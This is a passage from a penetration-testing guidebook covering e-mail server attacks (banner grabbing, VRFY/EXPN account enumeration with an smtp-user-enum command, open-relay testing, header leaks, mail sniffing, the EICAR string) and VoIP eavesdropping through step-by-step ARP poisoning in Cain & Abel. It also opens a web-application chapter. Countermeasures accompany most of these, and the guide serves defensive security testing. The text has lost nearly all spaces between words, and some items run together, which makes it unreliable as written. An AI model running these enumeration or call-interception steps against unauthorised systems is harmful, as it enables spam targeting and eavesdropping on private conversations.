Thee-mailsoftwaretypeandserverversionareoftenveryobviousandgivehackerssomeideasaboutpossibleattacks,especiallyiftheysearchavulnerabilitydatabaseforknownvulnerabilitiesofthatsoftwareversion.Figure14-3showsthesamee-mailserverwithitsSMTPbannerchangedfromthedefault(okay,thepreviousonewas,too)todisguisesuchinformationasthee-mailserver’sversionnumber.
Figure14-3:AnSMTPbannerthatdisguisestheversioninformation.
YoucangatherinformationonPOP3andIMAPe-mailservicesbytelnettingtoport110(POP3)orport143(IMAP).
IfyouchangeyourdefaultSMTPbanner,don’tthinkthatnoonecanfigureouttheversion.Generalvulnerabilityscannerscanoftendetecttheversionofyoure-mailserver.OneLinux-basedtoolcalledsmtpscan(www.freshports.org/security/smtpscan/)determinese-mailserverversioninformationbasedonhowtheserverrespondstomalformedSMTPrequests.Figure14-4showstheresultsfromsmtpscanagainstthesameservershowninFigure14-3.Thesmtpscantooldetectedtheproductandversionnumberofthee-mailserver.
Figure14-4:smtpscangathersversioninfoevenwhentheSMTPbannerisdisguised.
CountermeasuresagainstbannerattacksThereisn’ta100percentsecurewayofdisguisingbannerinformation.IsuggestthesebannersecuritytipsforyourSMTP,POP3,andIMAPservers:
Changeyourdefaultbannerstoconcealtheinformation.Makesurethatyou’realwaysrunningthelatestsoftwarepatches.Hardenyourserverasmuchaspossiblebyusingwell-knownbestpracticesfromsuchresourcesastheCenterforInternetSecurity(www.cisecurity.org)andNIST(http://csrc.nist.gov).
SMTPattacksSomeattacksexploitweaknessesinSMTP.Thise-mailcommunicationprotocol—whichisoverthreedecadesold—wasdesignedforfunctionality,notsecurity.
AccountenumerationAcleverwaythatattackerscanverifywhethere-mailaccountsexistonaserverissimplytotelnettotheserveronport25andruntheVRFYcommand.TheVRFY—shortforverify—commandmakesaservercheckwhetheraspecificuserIDexists.Spammersoftenautomatethismethodtoperformadirectoryharvestattack(DHA),whichisawayofgleaningvalide-mailaddressesfromaserverordomainsohackersknowwhomtosendspam,phishing,ormalware-infectedmessagesto.
Attacksusingaccountenumeration
Figure14-5showshoweasyitistoverifyane-mailaddressonaserverwiththeVRFYcommandenabled.Scriptingthisattackcantestthousandsofe-mailaddresscombinations.
Figure14-5:UsingVRFYtoverifythatane-mailaddressexists.
TheSMTPcommandEXPN—shortforexpand—mightallowattackerstoverifywhatmailinglistsexistonaserver.Youcansimplytelnettoyoure-mailserveronport25andtryEXPNonyoursystemifyouknowofanymailingliststhatmightexist.Figure14-6showshowtheresultmightlook.Scriptingthisattackandtesting
thousandsofmailinglistcombinationsissimple.
Figure14-6:UsingEXPNtoverifythatamailinglistexists.
Youmightgetbogusinformationfromyourserverwhenperformingthesetwotests.SomeSMTPservers(suchasMicrosoftExchange)don’tsupporttheVRFYandEXPNcommands,andsomee-mailfirewallssimplyignorethemorreturnfalseinformation.
AnotherwaytosomewhatautomatetheprocessistousetheEmailVerifyprograminTamoSoft’sEssentialNetTools(www.tamos.com/products/nettools).AsshowninFigure14-7,yousimplyenterane-mailaddress,clickStart,andEmailVerifyconnectstotheserverandpretendstosendane-mail.
Figure14-7:UsingEmailVerifytoverifyane-mailaddress.
Yetanotherwaytocapturevalide-mailaddressesistousetheHarvester(https://github.com/laramies/theHarvester)togleanaddressesviaGoogleandothersearchengines.AsIoutlineinChapter9,youcandownloadKaliLinuxfromwww.kali.orgtoburntheISOimagetoCDorboottheimagedirectlythroughVMwareorVirtualBox.IntheKaliLinuxGUI,simplychooseApplications ⇒ InformationGathering ⇒ SMTPAnalysis ⇒ smtp-user-enumandentersmtp-user-enum–MVRFY–u<usernameyouwishtoconfirm>-tserverIP/hostname,asshowninFigure14-8.
Figure14-8:Usingsmtp-user-enumforgleaninge-mailaddresses.
Youcancustomizesmtp-user-enumqueriesaswellusing,forexample,EXPNinplaceofVRFYand–Uandalistofusernamesinafiletoquerymorethanoneuser.Simplyentersmtp-user-enumforallthesearchoptions.
Countermeasuresagainstaccountenumeration
Ifyou’rerunningExchange,accountenumerationwon’tbeanissue.Ifyou’renotrunningExchange,thebestsolutionforpreventingthistypeofe-mailaccountenumerationdependsonwhetheryouneedtoenabletheVRFYandEXPNcommands:
DisableVRFYandEXPNunlessyouneedyourremotesystemstogatheruserandmailinglistinformationfromyourserver.IfyouneedVRFYandEXPNfunctionality,checkyoure-mailserverore-mailfirewalldocumentationfortheabilitytolimitthesecommandstospecifichostsonyournetworkortheInternet.
Finally,workwithyourmarketingteamandwebdeveloperstoensurethatcompanye-mailaddressesarenotpostedonyourorganization’swebsiteoronsocialmediawebsites.Also,educateyourusersaboutnotdoingthis.
RelaySMTPrelayletsuserssende-mailsthroughexternalservers.Opene-mailrelaysaren’ttheproblemtheyusedtobe,butyoustillneedtocheckforthem.Spammersandcriminalhackerscanuseane-mailservertosendspamormalwarethroughe-mailundertheguiseoftheunsuspectingopen-relayowner.
Besuretotestforopenrelayfrombothoutsideandinsideyournetwork.Ifyoutestyourinternalsystems,youmightgetfalsepositivesbecauseoutbounde-mailrelayingmightbeconfiguredandnecessaryforyourinternale-mailclientstosendmessagestotheoutsideworld.However,ifaclientsystemiscompromised,thatissuecouldbejustwhatthebadguysneedtolaunchaspamormalwareattack.
Automatictesting
HereareacoupleofeasywaystotestyourserverforSMTPrelay:
VulnerabilityScanners:ManyvulnerabilityscannerssuchasNexposeandQualysGuardwillfindopene-mailrelayvulnerabilities.
Windows-basedtools:OneexampleisNetScanToolsPro(www.netscantools.com).YoucanrunanSMTPRelaycheckonyoure-mailserverwithNetScanToolsPro,asshowninFigure14-9.
AlthoughsomeSMTPserversacceptinboundrelayconnectionsandmakeitlooklikerelayingworks,thisisn’talwaysthecasebecausetheinitialconnectionmightbeallowed,butthefilteringactuallytakesplacebehindthescenes.Checkwhetherthee-mailactuallymadeitthroughbycheckingtheaccountyousentthetestrelaymessageto.
Figure14-9:UsingNetScanToolsProSMTPServerTeststocheckforanopene-mailrelay.
InNetScanToolsPro,yousimplyentervaluesfortheSMTPmailservernameandYourSendingDomainName.InsideTestMessageSettings,entertheRecipientEmail
AddressandSender’sEmailAddress.Ifthetestissuccessful,NetScanToolsProwillopenawindowthatsays“MessageSentSuccessfully.”
YoucanalsoviewtheresultsinthemainSMTPServerTestswindowandgenerateaformalreportbysimplyclickingViewResultsinaWebBrowserandthenclickingViewRelayTestResults.
Manualtesting
YoucanmanuallytestyourserverforSMTPrelaybytelnettingtothee-mailserveronport25.Followthesesteps:
1. Telnettoyourserveronport25.
Youcandothisintwoways:
Useyourfavoritegraphicaltelnetapplication,suchasHyperTerminal(whichcomeswithWindows)orSecureCRT(www.vandyke.com/products/securecrt/index.html).EnterthefollowingcommandataWindowsorLinuxcommandprompt:
telnetmailserver_address25
YoushouldseetheSMTPwelcomebannerwhentheconnectionismade.
2. Enteracommandtotelltheserver,“Hi,I’mconnectingfromthisdomain.”
Aftereachcommandinthesesteps,youshouldreceiveadifferent-numberedmessage,suchas999OK.Youcanignorethesemessages.
3. Enteracommandtotelltheserveryoure-mailaddress.
Forexample:mailfrom:[email protected]
4. Enteracommandtotelltheserverwhotosendthee-mailto.
Forexample:rcptto:[email protected]
Again,anye-mailaddresswillsuffice.
5. Enteracommandtotelltheserverthatthemessagebodyistofollow.
Forexample:data
6. Enterthefollowingtextasthebodyofthemessage:Arelaytest!
7. Endthecommandwithaperiodonalinebyitself.
Youcanenter?orhelpatthefirsttelnetprompttoseealistofallthesupportedcommandsand,dependingontheserver,gethelpontheuseofthecommands.
Thefinalperiodmarkstheendofthemessage.Afteryouenterthisfinalperiod,yourmessagewillbesentifrelayingisallowed.
8. Checkforrelayingonyourserver:
LookforamessagesimilartoRelaynotallowedcomingbackfromtheserver.
Ifyougetamessagesimilartothis,SMTPrelayingiseithernotallowedonyourserverorisbeingfilteredbecausemanyserversblockmessagesthatappeartooriginatefromtheoutsideyetcomefromtheinside.
Youmightgetthismessageafteryouenterthercptto:command.
Ifyoudon’treceiveamessagefromyourserver,checkyourInboxfortherelayede-mail.
Ifyoureceivetheteste-mailyousent,SMTPrelayingisenabledonyourserverandprobablyneedstobedisabled.Thelastthingyouwantistoletspammersorotherattackersmakeitlooklikeyou’resendingtonsofspam,orworse,tobeblacklistedbyoneormoreoftheblacklistproviders.Endinguponablacklistcandisrupte-mailsendingandreceiving—notgoodforbusiness!
CountermeasuresagainstSMTPrelayattacks
Youcanimplementthefollowingcountermeasuresonyoure-mailservertodisableoratleastcontrolSMTPrelaying:
DisableSMTPrelayonyoure-mailserver.SMTPshouldbedisabledbydefault.However,itpaystocheck.Ifyoudon’tknowwhetheryouneedSMTPrelay,youprobablydon’t.YoucanenableSMTPrelayforspecifichostsontheserverorwithinyourfirewallconfiguration.Enforceauthenticationifyoure-mailserverallowsit.Youmightbeabletorequirepasswordauthenticationonane-mailaddressthatmatchesthee-mailserver’sdomain.Checkyoure-mailserverandclientdocumentationfordetailsonsettingupthistypeofauthentication.
E-mailheaderdisclosuresIfyoure-mailclientandserverareconfiguredwithtypicaldefaults,amaliciousattackermightfindcriticalpiecesofinformation:
InternalIPaddressofyoure-mailclientmachine(whichcanleadtotheenumerationofyourinternalnetworkandeventualexploitationviaphishingand/orsubsequentmalwareinfection)Softwareversionsofyourclientande-mailserveralongwiththeirvulnerabilitiesHostnamesthatcandivulgeyournetworknamingconventions
Testing
Figure14-10showstheheaderinformationrevealedinateste-mailIsenttomyfreewebaccount.Asyoucansee,itshowsoffquiteabitofinformationaboutmye-mailsystem:
ThethirdReceivedlinedisclosesmysystem’shostname,IPaddress,servername,ande-mailclientsoftwareversion.TheX-MailerlinedisplaystheMicrosoftOutlookversionIusedtosendthismessage.
Figure14-10:Criticalinformationrevealedine-mailheaders.
Countermeasuresagainstheaderdisclosures
Thebestcountermeasuretopreventinformationdisclosuresine-mailheadersistoconfigureyoure-mailserverore-mailfirewalltorewriteyourheaders,byeitherchangingtheinformationshownorremovingit.Checkyoure-mailserverorfirewalldocumentationtoseewhetherthisisanoption.
Ifheaderrewritingisnotavailable(orevenallowedbyyourISP),youstillmightpreventthesendingofsomecriticalinformation,suchasserversoftwareversionnumbersandinternalIPaddresses.
CapturingtrafficE-mailtraffic,includingusernamesandpasswords,canbecapturedwithanetworkanalyzerorane-mailpacketsnifferandreconstructor.
Mailsnarfisane-mailpacketsnifferandreconstructorthat’spartofthedsniffpackage(http://sectools.org/tool/dsniff).There’sagreatcommercial(yetlow-cost)programcalledNetResident(www.tamos.com/products/netresident),too.YoucanalsouseCain&Abel(www.oxid.it/cain.html)tohighlighte-mail-in-transitweaknesses.IcoverpasswordcrackingusingthistoolandothersinChapter8.
Iftrafficiscaptured,ahackerormaliciousinsidercancompromiseonehostandpotentiallyhavefullaccesstoanotheradjacenthost,suchasyoure-mailserver.
MalwareE-mailsystemsareregularlyattackedbysuchmalwareasvirusesandworms.Oneofthemostimportanttestsyoucanrunformalwarevulnerabilityistoverifythatyourantivirussoftwareisactuallyworking.
Beforeyoubegintestingyourantivirussoftware,makesurethatyouhavethelatestvirussoftwareengineandsignaturesloaded.
EICARoffersasafeoptionforcheckingtheeffectivenessofyourantivirussoftware.AlthoughEICARisbynomeansacomprehensivemethodoftestingformalwarevulnerabilities,itservesasagood,safestart.
EICARisaEuropean-basedmalwarethinktankthathasworkedinconjunctionwithanti-malwarevendorstoprovidethisbasicsystemtest.TheEICARteststringtransmitsinthebodyofane-mailorasafileattachmentsothatyoucanseehowyourserverandworkstationsrespond.Youbasicallyaccess(load)thisfile—whichcontainsthefollowing68-characterstring—onyourcomputertoseewhetheryourantivirusorothermalwaresoftwaredetectsit:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICARSTANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Youcandownloadatextfilewiththisstringfromwww.eicar.org/86-0-Intended-use.html.Severalversionsofthefileareavailableonthissite.IrecommendtestingwiththeZipfiletomakesurethatyourantivirussoftwarecandetectmalwarewithincompressedfiles.
Whenyourunthistest,youmayseeresultsfromyourantivirussoftwaresimilartoFigure14-11.
Figure14-11:UsingtheEICARteststringtotestantivirussoftware.
Inadditiontotestingyourantivirussoftware,youcanattacke-mailsystemsusingothertoolsIcoverinthisbook.Metasploit(www.metasploit.com)enablesyoutodiscovermissingpatchesinExchangeandotherserversthathackerscouldexploit.Brutus(www.hoobie.net/brutus)enablesyoutotestthecrackingofwebandPOP3/IMAPpasswords.
Generalbestpracticesforminimizinge-mailsecurityrisksThefollowingcountermeasureshelpkeepmessagesassecureaspossible.
SoftwaresolutionsTherightsoftwarecanneutralizemanythreats:
Useanti-malwaresoftwareonthee-mailserver—better,thee-mailgateway—topreventmalwarefromreachinge-mailclients.Cloud-basede-mailsystemssuchasthoseofferedbyGoogleandMicrosoftoftenhavesuchprotectionbuiltin.Usingmalwareprotectiononyourclientsisagiven.Applythelatestoperatingsystemande-mailserversecuritypatchesconsistentlyandafteranysecurityalertsarereleased.
Encrypt(where’sitreasonable).YoucanuseS/MIMEorPGPtoencryptsensitivemessagesorusee-mailencryptionatthedesktoplevelortheserverore-mailgateway.Betteryet(i.e.aneasiermeans),youcanalsouseTLSviathePOP3S,IMAPS,andSMTPSprotocols.Thebestoptionmaybetouseane-mailsecurityapplianceorcloudservicethatsupportsthesendingandreceivingofencryptede-mailsviaawebbrowseroverHTTPS.
Don’tdependonyouruserstoencryptmessages.Aswithanyother
securitypolicyorcontrol,relyingonuserstomakesecuritydecisionsoftenendspoorly.Useanenterprisesolutiontoencryptmessagesautomaticallyinstead.
Makesurethatencryptedfilesande-mailscanbeprotectedagainstmalware.
Encryptiondoesn’tkeepmalwareoutoffilesore-mails.Youjusthaveencryptedmalwarewithinthefilesore-mails.Encryptionkeepsyourserverorgatewayanti-malwarefromdetectingthemalwareuntilitreachesthedesktop.
Makeitpolicyforusersnottoopenunsolicitede-mailsoranyattachments,especiallythosefromunknownsenders,andcreateongoingawarenesssessionsandotherreminders.Planforuserswhoignoreorforgetaboutthepolicyofnotopeningunsolicitede-mailsandattachments.Itwillhappen!
OperatingguidelinesSomesimpleoperatingrulescankeepyourwallshighandtheattackersoutofyoure-mailsystems:
Putyoure-mailserverbehindafirewallonadifferentnetworksegmentfromtheInternetandfromyourinternalLAN—ideallyinademilitarizedzone(DMZ).Hardenbydisablingunusedprotocolsandservicesonyoure-mailserver.Runyoure-mailserverandperformmalwarescanningondedicatedserversifpossible(potentiallyevenseparatinginboundandoutboundmessages).Doingsocankeepmaliciousattacksoutofotherserversandinformationintheeventthee-mailserverishacked.Logalltransactionswiththeserverincaseyouneedtoinvestigatemalicioususe.Besuretomonitortheselogsaswell!Ifyoucannotjustifymonitoring,consideroutsourcingthisfunctiontoamanagedsecurityservicesprovider.Ifyourserverdoesn’tneedcertaine-mailservicesrunning(SMTP,POP3,andIMAP),disablethem—immediately.Forweb-basede-mail,suchasMicrosoft’sOutlookWebAccess(OWA),properlytestandsecureyourwebserverapplicationandoperatingsystembyusingthetestingtechniquesandhardeningresourcesImentionthroughoutthisbook.Requirestrongpasswords.Beitstandaloneaccountsordomain-levelExchangeorsimilaraccounts,anypasswordweaknessesonthenetworkwilltrickleovertoe-mailandsurelybeexploitedbysomeoneviaOutlookWebAccessorPOP3.IcoverpasswordhackinginChapter8.Ifyou’rerunningsendmail—especiallyanolderversion—considerrunninga
securealternative,suchasPostfix(www.postfix.org)orqmail(www.qmail.org).
UnderstandingVoiceoverIPAwidely-usedtechnologyinenterprisestodayisVoiceoverIP(VoIP).Whetherit’sin-houseVoIPsystemsorsystemsforremoteusers,VoIPservers,softphones,andotherrelatedcomponentshavetheirownsetofsecurityvulnerabilities.Likemostthingssecurity-related,manypeoplehaven’tthoughtaboutthesecurityissuessurroundingvoiceconversationstraversingtheirnetworksortheInternet—butitcertainlyneedstobeonyourradar.Don’tfret—it’snottoolatetomakethingsright.Justremember,though,thatevenifprotectivemeasuresareinplace,VoIPsystemsneedtobeincludedaspartofyouroverallsecuritytestingstrategyonacontinuousbasis.
VoIPvulnerabilitiesAswithanytechnologyorsetofnetworkprotocols,thebadguysarealwaysgoingtofigureouthowtobreakin.VoIPiscertainlynodifferent.Infact,givenwhat’satstake(phoneconversationsandphonesystemavailability),there’scertainlyalottolose.
VoIP-relatedsystemsarenomore(orless)securethanothercommoncomputersystems.Why?It’ssimple.VoIPsystemshavetheirownoperatingsystem,theyhaveIPaddresses,andthey’reaccessibleonthenetwork.CompoundingtheissueisthefactthatmanyVoIPsystemshousemoreintelligence—afancywordfor“morestuffthatcangowrong”—whichmakesVoIPnetworksevenmorehackable.
IfyouwanttofindoutmoreabouthowVoIPoperates,whichwillundoubtedlyhelpyourootoutvulnerabilities,checkoutVoIPForDummiesbyTimothyV.Kelly.
Ononehand,VoIPsystemshavevulnerabilitiesverysimilartoothersystemsIcoverinthisbook,including
DefaultsettingsMissingpatchesWeakpasswords
That’swhyusingthestandardvulnerabilityscanningtoolsIcoverisimportant.Figure14-12showsvariousvulnerabilitiesassociatedwiththeauthenticationmechanisminthewebinterfaceofaVoIPadapter.
Figure14-12:AWebInspectscanofaVoIPnetworkadaptershowingseveralweaknesses.
Lookingattheseresults,apparentlythisdeviceisjustabasicwebserver.That’sexactlymypoint—VoIPsystemsarenothingmorethannetworkedcomputersystemsthathavevulnerabilitiesthatcanbeexploited.
Ontheotherhand,twomajorsecurityweaknessesaretiedspecificallytoVoIP.Thefirstisthatofphoneservicedisruption.Yep,VoIPissusceptibletodenialofservicejustlikeanyothersystemorapplication.VoIPisasvulnerableasthemosttiming-sensitiveapplicationsoutthere,giventhelowtolerancefolkshaveforchoppyanddroppedphoneconversations(cellphonesaside,ofcourse).TheotherbigweaknesswithVoIPisthatvoiceconversationsareusuallynotencryptedandthuscanbeinterceptedandrecorded.Imaginethefunabadguycouldhaverecordingconversationsandblackmailinghisvictims.Thisisveryeasyonunsecuredwirelessnetworks,butasIshowintheupcoming“Capturingandrecordingvoicetraffic”section,it’salsoprettysimpletocarryoutonwirednetworks.
IfaVoIPnetworkisnotprotectedvianetworksegmentation,suchasavirtuallocalareanetwork(VLAN),thenthevoicenetworkisespeciallysusceptibletoeavesdropping,denialofservice,andotherattacks.ButtheVLANbarriercanbe
overcomeinmanyenvironmentsbyusingatoolcalledVoIPHopper(http://voiphopper.sourceforge.net).Justwhenyouthinkyourvoicesystemsaresecure,atoollikeVoIPHoppercomesalong.Gottaloveinnovation!
Unliketypicalcomputersecurityvulnerabilities,theseissueswithVoIParen’teasilyfixedwithsimplesoftwarepatches.ThesevulnerabilitiesareembeddedintotheSessionInitiationProtocol(SIP)andReal-timeTransportProtocol(RTP)thatVoIPusesforitscommunications.ThefollowingaretwoVoIP-centrictestsyoushouldusetoassessthesecurityofyourvoicesystems.
It’simportanttonotethatalthoughSIPisthemostwidelyusedVoIPprotocol,thereisH.323.So,don’tspinyourwheelstestingforSIPflawsifH.323istheprotocolinuse.Refertowww.packetizer.com/ipmc/h323_vs_sipforadditionaldetailsonH.323versusSIP.
ScanningforvulnerabilitiesOutsidethebasicnetwork,OS,andwebapplicationvulnerabilities,youcanuncoverotherVoIPissuesifyouusetherighttools.ThegoodnewsisthatyoulikelyalreadyhavethesetoolsatyourdisposalintheformofnetworkvulnerabilityscannerssuchasNexpose(www.rapid7.com/products/nexpose)andwebvulnerabilityscannerssuchasNetsparker(www.netsparker.com).CommonflawsintheVoIPcallmanagersandphonesincludeweakpasswords,cross-sitescripting,andmissingpatchesthatcanbeexploitedusingatoolsuchasMetasploit.
KaliLinuxhasseveralVoIPtoolsbuiltinviaApplications/VulnerabilityAnalysis/VoIPTools.OtherfreetoolsforanalyzingSIPtrafficarePROTOS(www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html),andsipsak(www.voip-info.org/wiki/view/Sipsak).AgoodwebsitethatlistsallsortsofVoIPtoolsiswww.voipsa.org/Resources/tools.php.
CapturingandrecordingvoicetrafficIfyouhaveaccesstothewiredorwirelessnetwork,youcancaptureVoIPconversationseasily.ThisisagreatwaytoprovethatthenetworkandtheVoIPinstallationarevulnerable.Therearemanylegalissuesassociatedwithtappingintophoneconversations,somakesureyouhavepermissionandarecarefulnottoabuseyourtestresults.
YoucanuseCain&Abel(technicallyjustCainforthefeaturesIdemonstratehere)totapintoVoIPconversations.YoucandownloadCain&Abelfreeatwww.oxid.it/cain.html.UsingCain’sARPpoisonroutingfeature,youcanplugintothenetworkandhaveitcaptureVoIPtraffic:
1. LoadCain&AbelandthenclicktheSniffertabtoenterthenetworkanalyzer
mode.
TheHostspageopensbydefault.
2. ClicktheStart/StopAPRicon(whichlookslikethenuclearwastesymbol).
TheARPpoisonroutingprocessstartsandenablesthebuilt-insniffer.
3. Clicktheblue+icontoaddhoststoperformARPpoisoningon.4. IntheMACAddressScannerwindowthatappears,ensurethatAllHostsin
MySubnetisselectedandthenclickOK.5. ClicktheAPRtab(theonewiththeyellow-and-blackcircleicon)toloadthe
APRpage.
6. ClickthewhitespaceundertheuppermostStatuscolumnheading(justundertheSniffertab).
Thisstepre-enablestheblue+icon.
7. Clicktheblue+iconandtheNewARPPoisonRoutingwindowshowsthehostsdiscoveredinStep3.
8. Selectyourdefaultrouteorotherhostthatyouwanttocapturepacketstravelingtoandfrom.
Ijustselectmydefaultroute,butyoumightconsiderselectingyourSIPmanagementsystemorothercentralVoIPsystem.Therightcolumnfillswithalltheremaininghosts.
9. Intherightcolumn,Ctrl+clickthesystemyouwanttopoisontocaptureitsvoicetraffic.
Inmycase,IselectmyVoIPnetworkadapter,butyoumightconsiderselectingallyourVoIPphones.
10. ClickOKtostarttheARPpoisoningprocess.
Thisprocesscantakeanywherefromafewsecondstoafewminutesdependingonyournetworkhardwareandeachhost’slocalTCP/IPstack.
11. ClicktheVoIPtabandallvoiceconversationsare“automagically”recorded.
Here’stheinterestingpart—theconversationsaresavedin.wavaudiofileformat,soyousimplyright-clicktherecordedconversationyouwanttotestandchoosePlay,asshowninFigure14-13.NotethatconversationsbeingrecordedshowRecording…intheStatuscolumn.
Figure14-13:UsingCain&Abeltocapture,record,andplaybackVoIPconversations.
ThevoicequalitywithCainandothertoolsdependsonthecodecyourVoIPdevicesuse.Withmyequipment,Ifindthequalityismarginalatbest.That’snotreallyabigdeal,though,becauseyourgoalistoprovethere’savulnerability—nottolisteninonotherpeople’sconversations.
There’salsoaLinux-basedtoolcalledvomit(http://vomit.xtdnet.nl)—shortforvoiceovermisconfiguredInternettelephones—thatyoucanusetoconvertVoIPconversationsinto.wavfiles.Youfirstneedtocapturetheactualconversationbyusingtcpdump,butifLinuxisyourpreference,thissolutionoffersbasicallythesameresultsasCain,outlinedintheprecedingsteps.
Ifyou’regoingtoworkalotwithVoIP,IhighlyrecommendyouinvestinagoodVoIPnetworkanalyzer.CheckoutWildPackets’OmniPeek—agreatall-in-onewiredandwirelessanalyzer(www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis—andTamoSoft’sCommView(www.tamos.com/products/commview),whichisagreatlow-pricedalternative.
TheseVoIPvulnerabilitiesareonlythetipoftheiceberg.Newsystems,software,andrelatedprotocolscontinuetoemerge,soitpaystoremainvigilant,helpingtoensureyourconversationsarelockeddownfromthosewithmaliciousintent.LikeI’vesaidbefore,ifithasanIPaddressoraURL,it’sfairgameforattack.
CountermeasuresagainstVoIPvulnerabilitiesLockingdownVoIPcanbetricky.Youcangetofftoagoodstart,though,bysegmentingyourvoicenetworkintoitsownVLAN—orevenadedicatedphysicalnetworkifthatfitsintoyourbudget.FurtherisolateanyInternet-connectedsystemssothatnotjustanyonecanconnecttothem(Iseethisoften).Youshouldalsomakesure
thatallVoIP-relatedsystemsarehardenedaccordingtovendorrecommendationsandwidelyacceptedbestpractices(suchasNIST’sSP800-58documentathttp://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf)andthatsoftwareandfirmwarearepatchedonaperiodicandconsistentbasis.
WebApplicationsandMobileAppsInThisChapter
Testingwebsitesandwebapplications
Uncoveringflawsinmobileapps
ProtectingagainstSQLinjectionandcross-sitescripting
Preventingloginweaknesses
Manuallyanalyzingsoftwareflaws
Counteringwebabuse
Analyzingsourcecode
Websitesandwebapplicationsarecommontargetsforattackbecausethey’reeverywhereandoftenopenforanyonetopokeandprod.Basicwebsitesusedformarketing,contactinformation,documentdownloads,andsoonareespeciallyeasyforthebadguystoplayaroundwith.Commonly-usedwebplatformssuchasWordPressandrelatedcontentmanagementsystemsareespeciallyvulnerabletoattackbecauseoftheirpresenceandlackoftestingandpatching.Forcriminalhackers,websitesthatprovideafrontendtocomplexapplicationsanddatabasesthatstorevaluableinformation,suchascreditcardandSocialSecuritynumbers,areespeciallyattractive.Thisiswherethemoneyis,bothliterallyandfiguratively.
Whyarewebsitesandapplicationssovulnerable?Theconsensusisthatthey’revulnerablebecauseofpoorsoftwaredevelopmentandtestingpractices.Soundfamiliar?Itshould;thissameproblemaffectsoperatingsystemsandpracticallyallaspectsofcomputersystems,includingautomobilesandrelatedInternetofThings(IoT)systems.Thisisthesideeffectofrelyingonsoftwarecompilerstoperformerrorchecking,questionableuserdemandforhigher-qualitysoftware,andemphasizingtime-to-marketandusabilityoversecurity.
Thischapterpresentssecurityteststorunonyourwebsites,applications,andmobileapps.Givenallthecustomconfigurationpossibilitiesandsystemcomplexities,youcantestforliterallythousandsofsoftwarevulnerabilities.Inthischapter,IfocusontheonesIseemostoftenusingbothautomatedscannersandmanualanalysis.Ialsooutlinecountermeasurestohelpminimizethechancesthatsomeonewithillintentcancarryouttheseattacksagainstwhatarelikelyconsideredyourmostcriticalbusinesssystems.
Iwanttopointoutthatthischaptermerelyskimsthesurfaceofallpossiblesoftwaresecurityflawsandwaystotestforthem.Additionalsourcesforbuildingyourwebsecuritytestingskillsarethetoolsandstandards,suchastheTop10WebApplicationSecurityRisksandTop10MobileRisks,providedbytheOpen
ChoosingYourWebSecurityTestingToolsGoodwebsecuritytestingtoolscanhelpensurethatyougetthemostfromyourwork.Aswithmanythingsinlife,Ifindthatyougetwhatyoupayforwhenitcomestotestingforwebsecurityholes.ThisiswhyImostlyusecommercialtoolsinmyworkwhentestingwebsitesandwebapplicationsforvulnerabilities.
Thesearemyfavoritewebsecuritytestingtools:
AcunetixWebVulnerabilityScanner(www.acunetix.com)forall-in-onesecuritytesting,includingaportscannerandanHTTPsnifferAppSpider(www.rapid7.com/products/appspider)forall-in-onesecuritytestingincludingexcellentcapabilitiesforauthenticatedscanning
WebDeveloper(http://chrispederick.com/work/web-developer)formanualanalysisandmanipulationofwebpages
Yes,youmustdomanualanalysis.Youdefinitelywanttouseascanner,becausescannersfindaroundhalfoftheissues.Fortheotherhalf,youneedtodomuchmorethanjustrunautomatedscanningtools.Rememberthatyouhavetopickupwherescannersleaveofftotrulyassesstheoverallsecurityofyourwebsitesandapplications.Youhavetodosomemanualworknotbecausewebvulnerabilityscannersarefaulty,butbecausepokingandproddingwebsystemssimplyrequiregoodold-fashionedhackertrickeryandyourfavoritewebbrowser.
Netsparker(www.netsparker.com)forall-in-onesecuritytestingthatoftenuncoversvulnerabilitiestheothertoolsdonot
Youcanalsousegeneralvulnerabilityscanners,suchasNexposeandLanGuard,aswellasexploittools,suchasMetasploit,whentestingwebsitesandapplications.Youcanusethesetoolstofind(andexploit)weaknessesatthewebserverlevelthatyoumightnototherwisefindwithstandardweb-scanningtoolsandmanualanalysis.Googlecanbebeneficialforrootingthroughwebapplicationsandlookingforsensitiveinformationaswell.Althoughthesenon–application-specifictoolscanbebeneficial,it’simportanttoknowthattheywon’tdrilldownasdeepasthetoolsImentionintheprecedinglist.
SeekingOutWebVulnerabilitiesAttacksagainstvulnerablewebsitesandapplicationsviaHypertextTransferProtocol(HTTP)makeupthemajorityofallInternet-relatedattacks.MostoftheseattackscanbecarriedouteveniftheHTTPtrafficisencrypted(viaHTTPS,alsoknownasHTTPoverSSL/TLS)becausethecommunicationsmediumhasnothingtodowiththeseattacks.Thesecurityvulnerabilitiesactuallyliewithinthewebsitesandapplicationsthemselvesorthewebserverandbrowsersoftwarethatthesystemsrunonandcommunicatewith.
Manyattacksagainstwebsitesandapplicationsarejustminornuisancesandmightnotaffectsensitiveinformationorsystemavailability.However,someattackscanwreakhavoconyoursystems,puttingsensitiveinformationatriskandevenplacingyourorganizationoutofcompliancewithstate,federal,andinternationalinformationprivacyandsecuritylawsandregulations.
ManualanalysisrequiredItcannotbestressedenoughhowimportantitistoperformmanualanalysisofwebsitesandapplicationsusingagood,old-fashionedwebbrowser.Youmostcertainlycan’tlivewithoutwebvulnerabilityscanners,butyoubetternotdependonthemtofindeverythingbecausetheywon’t.Commonwebsecurityvulnerabilitiesthatyoumustcheckforinclude:
Specificpasswordrequirementsincludingwhetherornotcomplexityisenforced
Whetherornotintruderlockoutworksaftersomanyfailedloginattempts
Whetherornotencryption(ideallyTransportLayerSecurity[TLS]Version1.2)isusedtoprotectusersessions,especiallylogins
Usersessionhandlingincludingconfirmingthatsessioncookiesarechangedafterloginandlogoutandwhetherornotsessionstimeoutafterareasonableperiodoftime
Fileuploadcapabilitiesandwhethermalwarecanbeuploadedtothesystem
Youdon’tnecessarilyhavetoperformmanualanalysisofyourwebsitesandapplicationseverytimeyoutest,butyouneedtodoitperiodically—atleastonceortwiceayear.Don’tletanyonetellyouotherwise!
DirectorytraversalIstartyououtwithasimpledirectorytraversalattack.Directorytraversalisareallybasicweakness,butitcanturnupinteresting—sometimessensitive—informationaboutawebsystem.Thisattackinvolvesbrowsingasiteandlookingforcluesabouttheserver’sdirectorystructureandsensitivefilesthatmighthavebeenloadedintentionallyorunintentionally.
Performthefollowingteststodetermineinformationaboutyourwebsite’sdirectorystructure.
